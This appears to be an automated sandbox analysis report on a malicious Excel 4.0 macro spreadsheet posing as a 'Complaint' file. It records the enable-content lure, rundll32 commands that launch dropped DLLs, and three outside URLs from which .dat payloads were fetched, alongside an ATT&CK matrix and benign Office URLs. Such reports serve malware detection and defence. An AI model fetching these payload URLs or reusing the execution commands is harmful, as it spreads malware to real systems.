    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Complaint-1992179913-02182021.xlsInitial sample: EXEC
    Source: Complaint-1992179913-02182021.xlsOLE indicator, VBA macros: true
    Source: Complaint-1992179913-02182021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: classification engineClassification label: mal84.expl.evad.winXLS@11/8@4/4
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{73D35F6B-8852-48AC-A0E2-76CBC5DD0E5B} - OProcSessId.datJump to behavior
    Source: Complaint-1992179913-02182021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint-1992179913-02182021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    rzminc.com1%VirustotalBrowse
    crt.sectigo.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    http://rzminc.com/fdzgprclatqo/44250666589120400000.dat0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat100%Avira URL Cloudmalware
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    http://jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    rzminc.com
    72.52.227.180
    truefalseunknown
    crt.sectigo.com
    91.199.212.52
    truefalseunknown
    jugueterialatorre.com.ar
    138.36.237.100
    truefalse
      unknown
      pathinanchilearthmovers.com
      162.241.80.6
      truefalse
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://rzminc.com/fdzgprclatqo/44250666589120400000.datfalse
        • Avira URL Cloud: safe
        unknown
        http://pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dattrue
        • Avira URL Cloud: malware
        unknown
        http://jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.datfalse
        • Avira URL Cloud: safe
        unknown
        http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crtfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
          high
          https://login.microsoftonline.com/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
            high
            https://shell.suite.office.com:14433A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
              high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                high
                https://autodiscover-s.outlook.com/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                  high
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                    high
                    https://cdn.entity.3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://api.addins.omex.office.net/appinfo/query3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                      high
                      https://wus2-000.contentsync.3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://clients.config.office.net/user/v1.0/tenantassociationkey3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                        high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                          high
                          https://powerlift.acompli.net3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://lookup.onenote.com/lookup/geolocation/v13A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                            high
                            https://cortana.ai3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                              high
                              https://cloudfiles.onenote.com/upload.aspx3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                  high
                                  https://entitlement.diagnosticssdf.office.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                    high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                      high
                                      https://api.aadrm.com/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                        high
                                        https://api.microsoftstream.com/api/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                          high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                            high
                                            https://cr.office.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                              high
                                              https://portal.office.com/account/?ref=ClientMeControl3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                high
                                                https://ecs.office.com/config/v2/Office3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                  high
                                                  https://graph.ppe.windows.net3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                    high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://powerlift-frontdesk.acompli.net3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://tasks.office.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                      high
                                                      https://officeci.azurewebsites.net/api/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                        high
                                                        https://store.office.cn/addinstemplate3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://wus2-000.pagecontentsync.3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                          high
                                                          https://globaldisco.crm.dynamics.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                            high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                              high
                                                              https://store.officeppe.com/addinstemplate3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://dev0-api.acompli.net/autodetect3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.odwebp.svc.ms3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.powerbi.com/v1.0/myorg/groups3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                high
                                                                https://web.microsoftstream.com/video/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                  high
                                                                  https://graph.windows.net3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                    high
                                                                    https://dataservice.o365filtering.com/3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://officesetup.getmicrosoftkey.com3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/api3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetect3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json3A40564D-B724-4EFB-A118-96220352F3F1.0.drfalse
                                                                        high
